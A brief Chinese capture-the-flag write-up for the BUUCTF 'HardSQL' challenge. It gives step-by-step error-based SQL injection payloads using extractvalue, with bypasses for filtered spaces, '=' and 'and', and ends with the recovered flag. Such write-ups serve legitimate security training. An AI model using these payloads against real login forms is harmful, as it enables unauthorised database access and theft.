BUUCTF [极客大挑战 2019]HardSQL

还是这个熟悉的登录页面

尝试万能密码登录，发现有过滤，一个一个试

过滤了空格，=,substr,and等等许多，双写也无法绕过，那么换报错注入试试

这里and用^绕过  空格用括号绕过 =用like绕过

用户名：1'^extractvalue(1,concat(0x7e,(select(database()))))#
密码随便输

1'^extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like'geek')))#

1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))#

1'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))#

 只有一半,用{left(),right()}

1'^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))#
1'^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))#

 拼起来得flag:flag{a23902dd-d567-42e5-b74f-d67bda971199}